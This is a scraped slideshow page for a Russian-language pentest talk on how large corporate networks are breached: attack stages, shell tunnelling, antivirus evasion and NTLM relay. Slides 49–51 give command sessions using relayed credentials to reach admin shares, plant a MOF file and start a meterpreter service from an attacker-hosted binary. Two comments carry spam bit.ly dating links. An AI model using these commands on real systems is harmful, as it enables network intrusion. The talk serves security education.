Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Истории из жизни. Как взламывают сети крупных организаций.

10,710 views

Published on

  • Sex in your area is here: ♥♥♥ http://bit.ly/39sFWPG ♥♥♥
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Dating for everyone is here: ❤❤❤ http://bit.ly/39sFWPG ❤❤❤
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Истории из жизни. Как взламывают сети крупных организаций.

  1. 1. Истории из жизни. Как взламываютсети крупных организаций.Дмитрий Евтеев
  2. 2. Что такое крупная сеть?- информационная система, в которой > 1.000 пользователейАрхитектура крупной сети предполагает:• Централизованное управление• Единый источник идентификаторов• Единая точка аутентификации и авторизации• Территориальная распределенностьВведение
  3. 3. Веб-приложенияИнтерфейсы администрирования…и прочий «зоопарк»DNS, интерфейсы обработки электронных сообщений, FTP,интерфейсы СУБД, LDAP, VPN/IPSEC, Netbios/SMB, Proxy/Socks, SNMP,NTP…Что содержится на периметре
  4. 4. ТелекомНа большом количестве сетевых устройств, найдутся такие, гдеиспользуются дефолты.ПромышленностьНа большом количестве идентификаторов пользователей, найдутсятакие, которые используют слабые пароли к удаленному перебору.Интересные наблюдения (по отрасли)
  5. 5. ГоссекторНеоправданно высокое внимание к отдельным направлениямобеспечения ИБ, наравне с отсутствием внимания к ИБ в целом.Финансовый секторПристальное внимание только к системам, обрабатывающим данныедержателей пластиковых карт, позволяет использовать уязвимости всмежных системах.Интересные наблюдения (по отрасли)
  6. 6. Россия• Linux/Apache/MySQL/PHP (LAMP)Индия• Linux/Tomcat/Oracle&DB2/JavaКитай• Windows/IIS/MSSQL/ASP.NETИнтересные наблюдения (по региону)
  7. 7. Основные этапы проведения атакиВыявление целей и сбор данных об объектахисследованияСокрытиеследовПоиск и эксплуатация уязвимостейСбор данных с новым уровнем доступаПовышение привилегийСбор данных с новым уровнем доступаРазвитие атаки с имеющимися привилегиямиЗакрепление своего присутствия
  8. 8. Соблюдение законовНапример: низя читать электронную поштуОграниченное времяМинимизация воздействияНапример: низя «убивать» аверовОтчетностьИногда требуется протокол всех совершаемых действий…помимо пятисот страничного технического отчетаОговорка по пентестам
  9. 9. Nmap, Nessus, etc.Rapid7 Metasploit FrameworkImmunity CANVASCORE ImpactSAINTexploitДругие источники:• public eq exploit-db.com• private …Поиск и эксплуатация уязвимостей
  10. 10. Доставка полезной нагрузкиОбеспечение «транспорта»Задачи, которые стоят перед атакующим
  11. 11. Обеспечение «транспорта» (сценарий 1)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  12. 12. Обеспечение «транспорта» (сценарий 1)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  13. 13. Обеспечение «транспорта» (сценарий 1)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  14. 14. Обеспечение «транспорта» (сценарий 1)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
  15. 15. Обеспечение «транспорта» (сценарий 1)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  16. 16. История из жизни («транспорт» через proxy)АРМ аудитораИнтернет123458101291413151617
  17. 17. Обеспечение «транспорта» (сценарий 2)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  18. 18. Обеспечение «транспорта» (сценарий 2)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  19. 19. Обеспечение «транспорта» (сценарий 2)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  20. 20. Обеспечение «транспорта» (сценарий 2)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  21. 21. История из жизни (реакция админа на tsh)
  22. 22. Обеспечение «транспорта» (сценарий 3)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)
  23. 23. Обеспечение «транспорта» (сценарий 3)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)http://http-tunnel.sourceforge.net/http://sensepost.com/labs/tools/pentest/reduhhttp://sourceforge.net/projects/webtunnel/
  24. 24. Обеспечение «транспорта» (сценарий 3)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)http://http-tunnel.sourceforge.net/http://sensepost.com/labs/tools/pentest/reduhhttp://sourceforge.net/projects/webtunnel/
  25. 25. Обеспечение «транспорта» (сценарий 3)Веб-сервер (W) Терминальный сервер (R)Атакующий (H)http://http-tunnel.sourceforge.net/http://sensepost.com/labs/tools/pentest/reduhhttp://sourceforge.net/projects/webtunnel/
  26. 26. История из жизни («транспорт» и доставка полезнойнагрузки через Lotus Domino)
  27. 27. «Транспорт» может быть разным…
  28. 28. За что я люблю крупные сети
  29. 29. Обход ограничений безопасностиhttp://devteev.blogspot.ru/2012/10/windows.html
  30. 30. Rapid7 Metasploit Framework :: meterpreterImmunity CANVAS :: MOSDEFCORE Impact :: Syscall Proxy AgentSAINTexploitПост-эксплуатация
  31. 31. Как обходятся аверы (1/3)
  32. 32. Как обходятся аверы (2/3)
  33. 33. Как обходятся аверы (3/3)
  34. 34. Как обходятся аверы (3/3)http://blog.gentilkiwi.com/mimikatz
  35. 35. Первостепенная цель атакующего - IAM / IDM
  36. 36. Но, как часто это бывает…
  37. 37. http://devteev.blogspot.ru/2012/02/drg-8-microsoft.htmlКак взламывают сети Microsoft
  38. 38. LM - LAN ManagerNTLM - NT LAN ManagerNTLMv2KerberosПротоколы аутентификации в сетях Microsoft
  39. 39. NTLM аутентификацияhttp://squirtle.googlecode.com/files/NTLM%20is%20Dead%20-%20DefCon%2016.pdf
  40. 40. NTLM-Relayhttp://webstersprodigy.net/2012/07/22/metasploit-generic-ntlm-relay-module/
  41. 41. Аутентификация по NTLMv1
  42. 42. Альтернатива NTLM-Relay (1/2)Mark Gamache,http://markgamache.blogspot.ru/2013/01/ntlm-challenge-response-is-100-broken.html
  43. 43. Альтернатива NTLM-Relay (1/2)Mark Gamache,http://markgamache.blogspot.ru/2013/01/ntlm-challenge-response-is-100-broken.html
  44. 44. Альтернатива NTLM-Relay (2/2)http://www.ampliasecurity.com/research/wcefaq.html
  45. 45. Owned in 60 seconds with ZackAttack (1/7)Zack Fase (@zfasel),https://github.com/zfasel/ZackAttack
  46. 46. Owned in 60 seconds with ZackAttack (2/7)
  47. 47. HTTP -> SMB NTLM relayOwned in 60 seconds with ZackAttack (3/7)
  48. 48. Owned in 60 seconds with ZackAttack (4/7)
  49. 49. ~# proxychains smbclient -U DNPRODUCTIE/admin%any //192.168.1.1/C$ProxyChains-3.1 (http://proxychains.sf.net)|S-chain|-<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OKDomain=[DNPRODUCTIE] OS=[Windows Server 2003 3790 Service Pack 2]Server=[Windows Server 2003 5.2]smb: > lsAUTOEXEC.BAT A 0 Mon Jan 28 10:20:37 2013boot.ini AHS 213 Mon Jan 28 09:53:27 2013...~# proxychains smbclient -U DNPRODUCTIE/admin%any //192.168.1.2/C$~# proxychains net rpc user -U"DNPRODUCTIE/admin"%"any" -S 192.168.1.1ProxyChains-3.1 (http://proxychains.sf.net)|DNS-response|: bt is not exist|S-chain|-<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OKadminIUSR_WADIWAM_WADkrbtgt...Owned in 60 seconds with ZackAttack (5/7)
  50. 50. exec over winmgmt~/mof# proxychains smbclient -U"WGW/ADMIN"%"any" //192.168.1.1/ADMIN$ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OKDomain=[DNPRODUCTIE] OS=[Windows Server 2003 3790 Service Pack 2]Server=[Windows Server 2003 5.2]smb: > cd system32/wbem/mofsmb: system32wbemmof> put q.mofputting file q.mof as system32wbemmofq.mof (1173.8 kb/s) (average 1173.8kb/s)smb: system32wbemmof>респект Вячеславу Егошину @vegoshinOwned in 60 seconds with ZackAttack (6/7)
  51. 51. exec over metsvc~# proxychains net rpc service create meterpreter meterpreter"192.168.1.5testmetsvc.exe service" -U"WGW/ADMIN"%"any" -S 192.168.1.1ProxyChains-3.1 (http://proxychains.sf.net)|S-chain|-<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OKSuccessfully created Service: meterpreter~# proxychains net rpc service start meterpreter -U"WGW/ADMIN"%"any" -S192.168.1.1Owned in 60 seconds with ZackAttack (7/7)
  52. 52. Реализация успешного сценария атаки – это какправило использование больше одной уязвимостиЧем больше по размеру информационная система, тембольше возможных путей для реализации атакВместо заключения: простые истины
  53. 53. Спасибо за внимание!sdevteev@gmail.comhttp://devteev.blogspot.comhttps://twitter.com/devteev

×